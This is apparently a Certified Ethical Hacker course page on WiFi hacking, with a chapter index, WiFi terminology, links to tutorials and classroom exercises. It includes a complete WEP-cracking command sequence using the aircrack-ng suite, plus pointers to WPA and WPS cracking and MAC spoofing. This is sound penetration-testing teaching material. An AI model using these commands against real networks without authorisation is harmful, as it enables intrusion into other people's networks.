- [ Certified Ethical Hacker v10 ] :: [ TOC ]
- [ Certified Ethical Hacker v10 ] :: [ Syllabus ]
- [ Certified Ethical Hacker v10 ] :: [ Chapters 1 & 2 ] :: Footprinting and Reconnaissance
- [ Certified Ethical Hacker v10 ] :: [ Chapter 3 ] :: Scanning
- [ Certified Ethical Hacker v10 ] :: [ Chapter 3 cont’d ] :: Enumeration
- [ Certified Ethical Hacker v10 ] :: [ Chapter 3 cont’d ] :: Vulnerability Analysis
- [ Certified Ethical Hacker v10 ] :: [ Chapter 4 ] :: Sniffing, Evasion and Packet Analysis
- [ Certified Ethical Hacker v10 ] :: [ Chapter 5 ] :: System Hacking
- [ Certified Ethical Hacker v10 ] :: [ Chapter 5 cont’d] :: Hash Cracking
- [ Certified Ethical Hacker v10 ] :: [ Chapter 6 ] :: Web Servers and Applications
- [ Certified Ethical Hacker v10 ] :: [ Chapter 6 cont’d] :: SQL Injection
- [ Certified Ethical Hacker v10 ] :: [ Chapter 6 cont’d] :: sqlmap
- [ Certified Ethical Hacker v10 ] :: [ Chapter 6 cont’d] :: Burp Suite
- [ Certified Ethical Hacker v10 ] :: [ Chapter 7 ] :: WiFi Hacking
- [ Certified Ethical Hacker v10 ] :: [ Chapter 8 ] :: Hacking Mobile Devices
- [ Certified Ethical Hacker v10 ] :: [ Chapter 8 cont’d ] :: Hacking the Internet of Things
- [ Certified Ethical Hacker v10 ] :: [ Chapter 9 ] :: Hacking in the Cloud
- [ Certified Ethical Hacker v10 ] :: [ Chapter 10 ] :: Trojans, Backdoors, Viruses and Worms
- [ Certified Ethical Hacker v10 ] :: [ Chapter 10 cont’d] :: Denial of Service
- [ Certified Ethical Hacker v10 ] :: [ Chapter 10 cont’d] :: Buffer Overflow
- [ Certified Ethical Hacker v10 ] :: [ Chapter 10 cont’d] :: Session Hijacking
- [ Certified Ethical Hacker v10 ] :: [ Chapter 11 ] :: Cryptography
- [ Certified Ethical Hacker v10 ] :: [ Chapter 12 ] :: Social Engineering
- [ Certified Ethical Hacker v10 ] :: [ Chapter 12 ] :: Physical Security
- [ Certified Ethical Hacker v10 ] :: [ Chapter 13 ] :: Pen Testing Methodology
- [ CEH Training ] :: [ Day 7 ]
- Using the GNU Debugger: John Hammond
- [ Review ] :: EC-Council’s iLabs Platform
- [ Certified Ethical Hacker v10 ] :: Using ngrok to Set a Trap From Inside NAT
- [ Certified Ethical Hacker v10 ] :: [ Practical ] :: Become a CEH Master
WiFi Basics
SSID: the human-readable name of the network
BSSID: the MAC address of the access point
ESSID: the name of a network that spans multiple access points
IVs: Initialization vectors, 24-bit strings appended to the network key that allow users to access the network with unique session keys
PWR (as listed in airodump-ng) is a negative number that indicates, basically, power loss. “Lower is better” means lower without the negative sign: -40 is better (more power, less loss) than -90 (lots of power loss) even though technically -90 is “lower.”
Alfa Networks wireless adapter – Usually just called an “Alfa card,” this is a high-powered USB-attached wifi adapter that makes MITM and evil hotspot exploits much easier.
WEP Cracking
WEP cracking is almost a useless skill to practice, because there are very few WEP-enabled access points in the wild today. Except that:
- WEP cracking is a great way to learn the -ng tools (like airodump-ng), which will definitely deepen your understanding of wifi.
- If you actually find a WEP access point you’ll be able to exploit it. (People forget to update things all the time.)
https://www.youtube.com/watch?v=RydsjNhUjdg
Note the commands:
# get wifi NIC name: airmon-ng # start a monitor: airmon-ng start wlan0 # substitute your interface name if it's not wlan0 # note problem processes reported, and kill them: kill <process_ID> # repeat as necessary # find nearby wifi networks: airodump-ng wlan0mon # on older systems may be mon0 # copy the BSSID you want # select a network: airodump-ng -c <channel> -w <output_file> --bssid <target_bssid> wlan0mon # or mon0 # open a new window and associate with the access point: aireplay-ng -1 0 -a <target_bssid> wlan0mon # or mon0 # -1 means authenticate with type 0, i.e. none # now begin injecting to generate IVs: aireplay-ng -3 -b <target_bssid> wlan0 # or mon0 # -3 is arp replay attack # watch Data column in older window; you need ~15k or more # open a new terminal and list files: ls # the capture file will be the one with the # <output_file> name above and the .cap extension # crack the key: aircrack-ng <filename>-01.cap #for example # aircrack-ng will run over and over as IVs accumulate # the password arrives in hex format: 01:02:03:04 etc. # once you get the key, be sure to stop aireplay-ng # and stop wlan0mon airmon-ng stop wlan0mon # restart normal networking # (restart the processes you killed above: service networking start service network-manager start # etc.
Now open the GUI Network Manager (on the top right in Kali), select the target network, and enter the hex key you got above. Remove the semicolons.
WEP Cracking with Gerix (an old GUI tool) for comparison
Meet Network Chuck: Hacking Public WiFi
Youtuber and pro instructor. You need to subscribe to his channel. Here’s a demo of hacking public Wifi with a Raspberry Pi and Kali:
Cracking WPA & WPA2 with Aircrack-ng on Kali Linux
https://www.youtube.com/watch?v=4DjyEnPH2bY
WPS Hacking with Reaver and Wash
WPS is awful. You can connect to a WAP with a 9-digit PIN number, which can almost instantly be found using Reaver. And you can find WPS-enabled access points using Wash.
Hacking WPA with WiFite
From our friend at JackkTutorials:
https://www.youtube.com/watch?v=nYcVoM79ywk
From another good channel, HakTools:
https://www.youtube.com/watch?v=k3RoC5C7CEc
Oops! You’ve been shunned! How do you get back onto WiFi?
You need to be aware of the macchanger command.
https://linuxconfig.org/how-to-change-mac-address-using-macchanger-on-kali-linux
Finding Rogue APs: inSSIDer
Exercises
- Cracking WEP with Kali. Follow this process against the access point I will provide.
- Cracking WPA. Follow the process of cracking WPA with Reaver and Wash.
- Cracking WPA2: Follow the example using Wi-Fite.
Bluetooth
Know the terminology:
Bluejacking
Bluesnarfing
Blueprinting
Bluetooth bazooka